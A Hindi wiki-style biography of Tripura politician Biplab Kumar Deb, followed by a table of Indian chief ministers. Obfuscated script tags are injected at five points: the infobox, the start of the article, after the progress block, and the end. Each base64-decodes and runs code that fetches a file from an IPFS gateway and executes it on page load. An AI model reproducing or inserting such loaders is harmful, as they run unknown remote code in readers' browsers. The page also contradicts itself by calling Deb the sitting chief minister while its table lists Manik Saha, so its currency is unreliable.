बिप्लब कुमार देब

भारत डिस्कवरी प्रस्तुति
आदित्य चौधरी (चर्चा | योगदान) द्वारा परिवर्तित 08:24, 10 फ़रवरी 2021 का अवतरण (Text replacement - "तेजी " to "तेज़ी")
यहाँ जाएँ:भ्रमण, खोजें
बिप्लब कुमार देब
बिप्लब कुमार देब
पूरा नाम बिप्लब कुमार देब
जन्म 25 नवम्बर, 1971
जन्म भूमि उदयपुर ज़िला, त्रिपुरा
अभिभावक पिता- हिरुधान देब
पति/पत्नी नीति देब
संतान एक पुत्र और एक पुत्री
नागरिकता भारतीय
पार्टी भारतीय जनता पार्टी
पद दसवें मुख्यमंत्री, त्रिपुरा
कार्य काल मुख्यमंत्री-9 मार्च, 2018 से पदस्थ
शिक्षा स्नातक
विद्यालय त्रिपुरा विश्वविद्यालय
अन्य जानकारी दिल्ली में रहने के दौरान ही ये राष्ट्रीय स्वयं सेवक संघ से जुड़ गए और उसके प्रशिक्षण कार्यक्रमों में हिस्सा लेने लगे। इन्होंने काफी समय तक पेेशेवर जिम इंस्ट्रेक्टर के रूप में भी कार्य किया।
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>बिप्लब कुमार देब (अंग्रेज़ी: Biplab Kumar Deb, जन्म: 25 नवंबर, 1971) भारतीय जनता पार्टी के राजनीतिज्ञ और त्रिपुरा के मुख्यमंत्री हैं। वह 7 जनवरी, 2016 से त्रिपुरा में भाजपा के प्रदेश अध्यक्ष हैं। बिप्लब कुमार देब 2018 में हुए त्रिपुरा विधानसभा चुनाव में भाजपा की जीत के सूत्रधार हैं। भारतीय कम्युनिस्ट पार्टी के नेतृत्व में 25 साल से शासन कर रही वाम मोर्चा सरकार को हराया। उन्होंने 9 मार्च, 2018 को त्रिपुरा के दसवें मुख्यमंत्री के रूप में शपथ ग्रहण की। पार्टी ने उन्हें 2015 में राज्य में महासंपर्क अभियान के प्रदेश संयोजक के तौर पर भी त्रिपुरा भेजा था।

जीवन परिचय

बिप्लब कुमार देब का जन्म 25 नवम्बर 1971 को त्रिपुरा के उदयपुर जिले के ककराबन नामक जगह पर हुआ। फिलहाल यह स्थान गोमती ज़िले में पड़ता है। यहीं स्कूली शिक्षा पूरी करने के बाद, उन्होंने त्रिपुरा विश्वविद्यालय से स्नातक किया और फिर आगे की पढ़ाई के लिए दिल्ली चले गए। दिल्ली में रहने के दौरान ही ये राष्ट्रीय स्वयं सेवक संघ से जुड़ गए और उसके प्रशिक्षण कार्यक्रमों में हिस्सा लेने लगे। इन्होंने काफी समय तक पेेशेवर जिम इंस्ट्रेक्टर के रूप में भी कार्य किया। बिप्लब कुमार देब की पत्नी नीति देब दिल्ली में भारतीय स्टेट बैंक में शाखा उपप्रबंधक के पद पर कार्यरत हैं। दोनों के एक पुत्र और एक पुत्री है। 2018 के विधानसभा चुनाव नजदीक आने पर बिप्लब कुमार देब की पत्नी ने भी अपनी बैंक की नौकरी से 3 महीने की छुट्टी ले ली थी और ज़्यादा से ज़्यादा मतदाताओं तक पहुंचने की कोशिश की थी।[1]

राजनैतिक परिचय

दिल्ली प्रवास के दौरान बिप्लब कुमार देब ने आरएसएस के लिए काम किया। यहीं उनकी मुलाकात सुनील देवधर से हुई, जो भाजपा की ओर से त्रिपुरा के प्रभारी थे। उल्लेखनीय है कि सुनील देवधर ने ही 2014 के लोकसभा चुनाव में नरेंद्र मोदी के लिए वाराणसी में चुनाव अभियान की कमान संभाली थी। बिप्लब देब के बारे में सुनील देवधर का कहना था कि- "मैं ऐसे नए और युवा चेहरे की तलाश में था, जो भाजपा को त्रिपुरा में लीड कर सके और यहां के लोगों की भावनाओं को पार्टी से जोड़ सके। जब बिप्लब मुझे दिल्ली में मिले तो उन्होंने त्रिपुरा के लोगों के बारे में अपनी चिंताएं व्यक्त की। मुझे लगा कि यह वही व्यक्ति है, जिसकी मुझे तलाश थी। मैंने उन्हें त्रिपुरा आकर यहाँ के लोगों के लिए काम करने के लिए आमंत्रित किया। 2016 में, लगभग 15 वर्षों के बाद वे फिर से त्रिपुरा लौटे। त्रिपुरा लौटकर उन्होंने अपनी पार्टी के लिए आधार जमाना शुरू किया। उनकी मेहनत का फल भी जल्द दिखा और 7 जनवरी, 2016 को सुधींद्र दासगुप्ता की जगह प्रदेश भाजपा की कमान सौंपी गई। इसके बाद से उन्होंने तेज़ीके साथ जमीनी स्तर पर काम शुरू कर दिया था। वे चुपचाप अपने अभियान में लगे रहे और जनता के बीच प्रदेश की समस्याओं को उठाते हुए अपनी पैठ गहरी करते रहे।

जमीन से जुड़े नेता

बिप्लब कुमार देब नरेंद्र मोदी को अपना राजनीतिक गुरु मानते हैं। चुनावी रैलियों में भी विप्लव ने जनता के बीच नरेंद्र मोदी की कर्मठता और दृढता को खूब भुनाया। देश भर से भाजपा के लोकप्रिय चेहरों और मंत्रियों को राज्य में लाकर प्रचार कराया और जनता का रुख अपने और अपनी पार्टी के पक्ष में मोड़ने में कामयाब रहे। बिप्लब कुमार देब को जमीन से जुड़े रहकर काम करने वाला नेता माना जाता है। जमीन से जुड़े रहने के बावजूद बिप्लब कुमार देब स्पष्टवादी और साफ सुथरी छवि वाले नेता माने जाते हैं। उनके खिलाफ किसी तरह का आप​राधिक मुकदमा दर्ज नहीं है। उनकी साफ सुथरी छवि और जमीनी स्तर पर जुड़ाव के कारण यहां की जनता ने उनके वादों पर विश्वास किया और 25 साल से चले आ रहे माकपा के शासन को एक झटके मेें उखाड़ फेंका।

योगदान

बिप्लब कुमार देब ने इन चुनावों में राज्य में रोजगार के अवसरों की कमी को मुददा बनाया। युवाओं से वादा किया कि अगर वे सत्ता में आते हैं तो उनकी सरकार युवाओं के लिए रोजगार के अवसर बढ़ाने पर केंद्रित होगी। राज्य के कर्मचारियों को भी उन्होंने 7वां वेतनमान देने का वादा किया। बिप्लब कुमार देब के इन्हीं सब प्रयासों का सुफल था कि कहां 2013 के पिछले विधानसभा चुनाव में भाजपा को 1 भी सीट नहीं मिल सकी थी और कहां पांच साल बाद 2018 में उनकी पार्टी आधे से ज्यादा सीटों 59 में से 35 पर जीतकर अपना परचम लहराने में कामयाब रही। इस चुनाव में बिप्लब कुमार देब ने प्रश्चिम त्रिपुरा की प्रतिष्ठित वनमालीपुर विधानसभा सीट से चुनाव लड़ा और जीत हासिल की। उनके खिलाफ माकपा के युवा मोर्चा डेमोक्रेटिक यूथ फेडरेशन ऑफ इंडिया के प्रदेश अध्यक्ष अमल चक्रवर्ती और मौजूदा कांग्रेसी विधायक गोपाल रॉय चुनाव मैदान में थे।[1]

त्रिपुरा के मुख्यमंत्री

9 मार्च, 2018 को बिप्लब कुमार देब ने त्रिपुरा के दसवें मुख्यमंत्री के रूप में शपथ ली।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 बिप्लब कुमार देब की जीवनी (हिंदी) www.Knowledgeum.Com। अभिगमन तिथि: 10 मार्च, 2018।

बाहरी कड़ियाँ

संबंधित लेख

भारतीय राज्यों में पदस्थ मुख्यमंत्री
क्रमांक राज्य मुख्यमंत्री तस्वीर पार्टी पदभार ग्रहण
1. अरुणाचल प्रदेश पेमा खांडू
Pema-Khandu.jpg
भाजपा 17 जुलाई, 2016
2. असम हिमंता बिस्वा सरमा
Himanta-Biswa-Sarma.jpg
भाजपा 10 मई, 2021
3. आंध्र प्रदेश वाई एस जगनमोहन रेड्डी
Y-S-Jaganmohan-Reddy.jpg
वाईएसआर कांग्रेस पार्टी 30 मई, 2019
4. उत्तर प्रदेश योगी आदित्यनाथ
Yogi-Adityanath-1.jpg
भाजपा 19 मार्च, 2017
5. उत्तराखण्ड पुष्कर सिंह धामी
Pushkar-Singh-Dhami.jpg
भाजपा 4 जुलाई, 2021
6. ओडिशा नवीन पटनायक
Naveen-Patnaik.jpg
बीजू जनता दल 5 मार्च, 2000
7. कर्नाटक सिद्धारमैया
Siddaramaiah.jpg
भारतीय राष्ट्रीय कांग्रेस 20 मई, 2023
8. केरल पिनाराई विजयन
Pinarayi Vijayan.jpg
मार्क्सवादी कम्युनिस्ट पार्टी 25 मई, 2016
9. गुजरात भूपेन्द्र पटेल
Bhupendra-Patel.jpg
भाजपा 12 सितम्बर, 2021
10. गोवा प्रमोद सावंत
Pramod-Sawant.jpg
भाजपा 19 मार्च, 2019
11. छत्तीसगढ़ विष्णु देव साय
Vishnu-Deo-Sai.jpg
भारतीय जनता पार्टी 13 दिसम्बर, 2023
12. जम्मू-कश्मीर रिक्त (राज्यपाल शासन) लागू नहीं 20 जून, 2018
13. झारखण्ड हेमन्त सोरेन
Hemant-Soren.JPG
झारखंड मुक्ति मोर्चा 29 दिसम्बर, 2019
14. तमिल नाडु एम. के. स्टालिन
M-K-Stalin.jpg
द्रविड़ मुन्नेत्र कड़गम 7 मई, 2021
15. त्रिपुरा माणिक साहा
Manik-Saha.jpeg
भाजपा 15 मई, 2022
16. तेलंगाना अनुमुला रेवंत रेड्डी
Revanth-Reddy.jpg
भारतीय राष्ट्रीय काँग्रेस 7 दिसंबर, 2023
17. दिल्ली अरविन्द केजरीवाल
KEJRIWAL.jpg
आप 14 फ़रवरी, 2015
18. नागालैण्ड नेफियू रियो
Neiphiu-Rio.jpg
एनडीपीपी 8 मार्च, 2018
19. पंजाब भगवंत मान
Bhagwant-Mann.jpg
आम आदमी पार्टी 16 मार्च, 2022
20. पश्चिम बंगाल ममता बनर्जी
Mamata Banerjee.jpg
तृणमूल कांग्रेस 20 मई, 2011
21. पुदुचेरी एन. रंगास्वामी
N-Rangasamy.jpg
कांग्रेस 7 मई, 2021
22. बिहार नितीश कुमार
Nitish-Kumar-1.jpg
जदयू 27 जुलाई, 2017
23. मणिपुर एन. बीरेन सिंह
N.Biren-Singh-1.jpg
भाजपा 15 मार्च, 2017
24. मध्य प्रदेश मोहन यादव
Mohan-Yadav.jpg
भाजपा 13 दिसंबर, 2023
25. महाराष्ट्र एकनाथ शिंदे
Eknath-Shinde.jpg
शिव सेना 30 जून, 2022
26. मिज़ोरम लालदुहोमा
Lalduhoma.jpg
जोरम पीपल्स मूवमेंट 8 दिसम्बर, 2023
27. मेघालय कॉनराड संगमा
Conrad-Sangma-1.jpg
एनपीपी 6 मार्च, 2018
28. राजस्थान भजन लाल शर्मा
Bhajan-Lal-Sharma.jpg
भारतीय जनता पार्टी 15 दिसम्बर, 2023
29. सिक्किम प्रेम सिंह तमांग
Prem-Singh-Tamang.jpg
सिक्किम क्रांतिकारी मोर्चा 27 मई, 2019
30. हरियाणा नायब सिंह सैनी
Nayab-Singh-Saini.jpg
भाजपा 12 मार्च, 2024
31. हिमाचल प्रदेश सुखविंदर सिंह सुक्खू
Sukhvinder-Singh-Sukhu.jpg
भारतीय राष्ट्रीय कांग्रेस 11 दिसम्बर, 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>त्रिपुरा